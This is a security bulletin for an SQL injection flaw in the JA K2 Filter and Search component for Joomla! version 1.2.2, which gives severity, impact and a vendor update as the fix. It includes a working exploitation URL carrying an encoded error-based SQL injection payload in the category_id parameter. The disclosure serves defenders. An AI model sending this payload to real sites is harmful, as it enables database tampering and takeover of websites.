SB2016102002 - SQL injection in JA K2 Filter Component for Joomla!
Published: October 20, 2016 Updated: January 4, 2017
Security Bulletin ID
SB2016102002
CSH Severity
Medium
Patch available
YES
Number of vulnerabilities
1
Exploitation vector
Remote access
Highest impact
Data manipulation
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 1 vulnerability.
1) SQL injection (CVE-ID: N/A)
The vulnerability allows a remote attacker to execute arbitrary SQL commands in vulnerable application.
The vulnerability exists due to insufficient sanitization of user-supplied data passed via "category_id" HTTP GET parameter to /index.php in ja-k2-filter-and-search component. A remote attacker can send a specially crafted HTTP request to vulnerable script and execute arbitrary SQL commands in web application database.
Successful exploitation may allow an attacker to gain complete control over vulnerable website.Exploitation example:
http://[host]/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27The vulnerability was reported in version 1.2.2. Prior versions may also be affected.
Remediation
Install update from vendor's website.